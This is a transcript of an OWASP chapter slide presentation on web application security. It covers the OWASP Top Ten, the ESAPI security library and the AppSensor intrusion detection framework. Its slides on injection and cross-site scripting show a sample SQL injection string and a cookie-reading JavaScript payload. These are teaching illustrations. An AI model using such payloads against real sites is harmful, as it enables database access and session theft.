Presentation is loading. Please wait.

Presentation is loading. Please wait.

“The cost of cybercrime is greater than the combined effect on the global economy of trafficking in marijuana, heroin and cocaine”|

Published byEdwin Brooks Modified over 8 years ago

Similar presentations

Presentation on theme: "“The cost of cybercrime is greater than the combined effect on the global economy of trafficking in marijuana, heroin and cocaine”|"— Presentation transcript:

1 Protecting Web Applications with ESAPI and AppSensor Manuel Lopez Arredondo manuel.lopez@owasp.org

2 “The cost of cybercrime is greater than the combined effect on the global economy of trafficking in marijuana, heroin and cocaine”|

3 Why Security is important?
Ponemon Institute. (2012) Cost of Cyber Crime Study:. Ponemon Institute LLC.

4 Why Security is important?
Verizon. (2012) Data BREACH Investigations Report:. Verizon LLC.

5 Why Security is important?

6 Mission Driven What is OWASP Nonprofit | World Wide | Unbiased
OWASP does not endorse or recommend commercial products or services

7 Community Driven What is OWASP 30,000 Mail List Participants
200 Active Chapters in 70 countries 1600+ Members, 56 Corporate Supporters 69 Academic Supporters

8 OWASP Guadalajara Chapter
What do we have to offer? Community of security professional Monthly meetings Mailing List Presentations Workshops Open forums for discussion Vendor neutral environments March 2012 – Till Date Meetings Workshops Conference News Letter Page Visit 3 1 2,528+

9 What is OWASP Quality Resources 200+ Projects
15,000+ downloads of tools, documentation 250,000+ unique visitors 800,000+ page views (monthly)

10 Quality Resources Code Tools 40% 10% 50% Documentation

11 OWASP Top Ten (2010 Edition)
A1: Injection A2: Cross-Site Scripting (XSS) A3: Broken Authentication and Session Management A4: Insecure Direct Object References A5: Cross Site Request Forgery (CSRF) A6: Security Misconfiguration A7: Failure to Restrict URL Access A8: Insecure Cryptographic Storage A9: Insufficient Transport Layer Protection A10: Unvalidated Redirects and Forwards

12 A1 – Injection Injection means…
Tricking an application into including unintended commands in the data sent to an interpreter Interpreters… Take strings and interpret them as commands SQL, OS Shell, LDAP, XPath, Hibernate, etc… SQL injection is still quite common Many applications still susceptible (really don’t know why) Even though it’s usually very simple to avoid Typical Impact Usually severe. Entire database can usually be read or modified May also allow full database schema, or account access, or even OS level access

13 "SELECT * FROM accounts WHERE acct=‘’ OR 1=1--’"
SQL Injection – Illustrated Account: SKU: Account: SKU: "SELECT * FROM accounts WHERE acct=‘’ OR 1=1--’" Account Summary Acct: Acct: Acct: Acct: HTTP response  DB Table  HTTP request SQL query Application Layer Accounts Finance Administration Transactions Communication Knowledge Mgmt E-Commerce Bus. Functions Databases Legacy Systems Web Services Directories Human Resrcs Billing APPLICATION ATTACK Custom Code 1. Application presents a form to the attacker 2. Attacker sends an attack in the form data App Server 3. Application forwards attack to the database in a SQL query Web Server Hardened OS 4. Database runs query containing attack and sends encrypted results back to application Network Layer Firewall Firewall 5. Application decrypts data as normal and sends results to the user

14 A2 – Cross-Site Scripting (XSS)
Occurs any time… Raw data from attacker is sent to an innocent user’s browser Raw data… Stored in database Reflected from web input (form field, hidden field, URL, etc…) Sent directly into rich JavaScript client Virtually every web application has this problem Try this in your browser – javascript:alert(document.cookie) Typical Impact Steal user’s session, steal sensitive data, rewrite web page, redirect user to phishing or malware site Most Severe: Install XSS proxy which allows attacker to observe and direct all user’s behavior on vulnerable site and force user to other sites

15 Cross-Site Scripting Illustrated
1 Attacker sets the trap – update my profile Application with stored XSS vulnerability Attacker enters a malicious script into a web page that stores the data on the server Custom Code Accounts Finance Administration Transactions Communication Knowledge Mgmt E-Commerce Bus. Functions 2 Victim views page – sees attacker profile Script runs inside victim’s browser with full access to the DOM and cookies 3 Script silently sends attacker Victim’s session cookie

16 Enterprise Security API
Project Leader: Chris Schmidt, Purpose: A free, open source, web application security control library that makes it easier for programmers to write lower-risk applications for Reboot

17 ESAPI - Vision Build a common set of security controls for today's most popular programming languages. Have interfaces in common across programming languages as much as possible and natural. Provide at least a simple reference implementation for each security control to serve as example if not useful in itself. Easily extensible Provide functionality that is most often needed, but lacking (or inconsistent) in various frameworks / languages.

18 Getting started Using ESAPI (1 of 3)
Download: ESAPI Cheat Sheet: ESAPI Swingset:

19 https://lists.owasp.org/mailman/listinfo/esapi-user
Using ESAPI (2 of 3) Getting help ESAPI User mailing list (focuses on Java version): ESAPI Developer mailing list: ESAPI Project page: (coming soon)

20 Getting involved Using ESAPI (3 of 3)
Many other language implementations, all playing catch up ESAPI for Java version needs help with user documentation ESAPI 2.1 (Java) starting soon ESAPI Swingset and Swingset Interactive → Port to use ESAPI 2.0

21 Enterprise Security API
Custom Enterprise Web Application Enterprise Security API Authenticator User AccessController AccessReferenceMap Validator Encoder HTTPUtilities Encryptor EncryptedProperties Randomizer Exception Handling Logger IntrusionDetector SecurityConfiguration Existing Enterprise Security Services/Libraries

22 Potential Enterprise ESAPI Cost Savings

23 Basic ESAPI Approach – Examples
In Java: String input = request.getParameter( "input" ); // Throws ValidationException or IntrusionException // if problem String cleaned = ESAPI.validator().getValidInput("Secure input example", input, "SafeString", // regex spec 200, // max lengyh false, // no nulls true); // canonicalize String safeHTML = ESAPI.encoder().encoderForHTML(cleaned);

24 Basic ESAPI Approach – Examples
In PHP: $cleanTmp = array(); // local in scope $cleanParams = array(); // local in scope $cleanTmp['username'] = ESAPI::getValidator()->getValidInput( "Secure input example", $input, "SafeString", 200, false, true); $cleanParams['username'] = ESAPI::getEncoder()->encodeForHTML($cleanTmp['username']);

25 OWASP ESAPI Project Scorecard Feature Set vs. Programming Language
Authentication 2.0 1.4 2.0 planned Identity Access Control Input Validation Output Escaping Canonicalization ??? Encryption Random Numbers Exception Handling Logging 1,4 Intrusion Detection Security Configuration TBD WAF

26 Source Code and Javadoc Online Now!

27 Create attack aware applications
AppSensor Project Leader(s): Michael Coates, John Melton, Colin Watson Purpose: Defines a conceptual framework and methodology that offers prescriptive guidance to implement intrusion detection and automated response into an existing application. Release: AppSensor Nov 2010 (Tool) & September 2008 (doc) Create attack aware applications

28

29

30 Detecting Attacks the Right Way
Detect INSIDE the Application Automatic Detection Comprehensive Minimize False Positives Understand Business Logic Immediate Response No Manual Efforts Required

31

32 Implementing AppSensor
Detection Points Application Log Server AppSensor Brain Response Listener

33

34 VIDEO DEMO

35 Think out of the box for development teams
Take aways Open Source solutions Low cost and low effort Think out of the box for development teams Techniques used on the Industry OWASP Google Summer of Code 2013

36 Q & A

37 Backup 37

38 About OWASP Online since December 1st 2001
Not-for-profit charitable organization OPEN Everything at OWASP is radically transparent from our finances to our code. INNOVATION OWASP encourages and supports innovation/experiments for solutions to software security challenges. GLOBAL Anyone around the world is encouraged to participate in the OWASP community. INTEGRITY OWASP is an honest and truthful, vendor agnostic, global community.

39 OWASP Success Story

40 OWASP Guadalajara Chapter
What do we have to offer? Community of security professional Monthly meetings Mailing List Presentations Workshops Open forums for discussion Vendor neutral environments March 2012 – Till Date Meetings Workshops Conference News Letter Page Visit 3 1 2,528+

41 Application Developers
New attacks/ defense guideline Cheat Sheets Web Goat-emulator-designed to teach web application security lessons

42 Application Testers and Quality Assurance
Testing guide Penetration testing tools Application Security Verification Standard Project

43 OWASP ZAP Proxy/ WebScarab / CSRF Tester

44 OWASP Testing Framework
4. Web Application Penetration Testing 4.2 Information Gathering 4.3 Configuration Management Testing 4.4 Business logic testing 4.5 Authentication Testing 4.6 Authorization Testing 4.7 Session Management Testing 4.8 Data Validation Testing 4.9 Testing for Denial of Service 4.10 Web Services Testing 4.11 Ajax Testing OWASP Testing Guide v3 V4 is not finalize

45 Application Project Management and Staff
Define the process SDLC Code Review Code review tool Decision maker

46 Download Get OWASP Books

47 Business advantages of being associated with OWASP
The main benefit of becoming an OWASP corporate supporter is to demonstrate the organization's belief that application security is important and that the organization is working to take necessary steps to properly address application security risk in their businesses The organization itself gets security benefit at reduced costs Security code review tools are free Lots of open & free security testing tools Security guidelines & best practices Opportunity to endorse organization's logo in OWASP events, conferences, & website The organization gets listed as a sponsor in the newsletter that goes to over 20,000 individuals around the world on owasp mailing lists and linked 'in group If you are looking to expand your business in emerging market here is an opportunity to reach out When organization becomes a supporter of a security community it helps employees, partners, suppliers and customers to understand the value & importance of security, and improves application security throughout the whole supply chain Membership options :

48 Join Us ! Subscribe mailing list
Chapter Leaders: Eduardo Cerna Mauel Lopez

49 App Sensor Design AppSensor “Brain” Demo App App Logs
Embedded AppSensor Response

Download ppt "“The cost of cybercrime is greater than the combined effect on the global economy of trafficking in marijuana, heroin and cocaine”|"

Similar presentations

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
OWASP Secure Coding Practices Quick Reference Guide

OWASP Secure Coding Practices Quick Reference Guide
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.
OWASP Web Vulnerabilities and Auditing

OWASP Web Vulnerabilities and Auditing
The OWASP Foundation OWASP Top 10 2010 Kuai Hinojosa Software Security Consultant at Cigital OWASP Global Education Committee OWASP.

The OWASP Foundation OWASP Top Kuai Hinojosa Software Security Consultant at Cigital OWASP Global Education Committee OWASP.
Hands on Demonstration for Testing Security in Web Applications

Hands on Demonstration for Testing Security in Web Applications
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.

Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.
WebGoat & WebScarab “What is computer security for $1000 Alex?”

WebGoat & WebScarab “What is computer security for $1000 Alex?”
Lesson 4: Web Browsing.

Lesson 4: Web Browsing.
The OWASP Foundation ABC About me MOSHIUL ISLAM, CISA A: Information System Auditor B: Currently working for a Bank – EBL, IT Security.

The OWASP Foundation ABC About me MOSHIUL ISLAM, CISA A: Information System Auditor B: Currently working for a Bank – EBL, IT Security.
Security Issues and Challenges in Cloud Computing

Security Issues and Challenges in Cloud Computing
Server-Side vs. Client-Side Scripting Languages

Server-Side vs. Client-Side Scripting Languages
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.

Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.

It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
ASP.NET 2.0 Chapter 6 Securing the ASP.NET Application.

ASP.NET 2.0 Chapter 6 Securing the ASP.NET Application.
The OWASP Foundation Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under.

The OWASP Foundation Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under.
“Today over 70% of attacks against a company’s network come at the ‘Application Layer’ not the Network or System layer.” - Gartner Is Your Web Application.

“Today over 70% of attacks against a company’s network come at the ‘Application Layer’ not the Network or System layer.” - Gartner Is Your Web Application.
Introduction to Systems Analysis and Design

Introduction to Systems Analysis and Design
Solving Real-World Problems with an Enterprise Security API (ESAPI) Chris Schmidt ESAPI Project Manager ESAPI4JS Project Owner Application Security Engineer.

Solving Real-World Problems with an Enterprise Security API (ESAPI) Chris Schmidt ESAPI Project Manager ESAPI4JS Project Owner Application Security Engineer.

Similar presentations

Ads by Google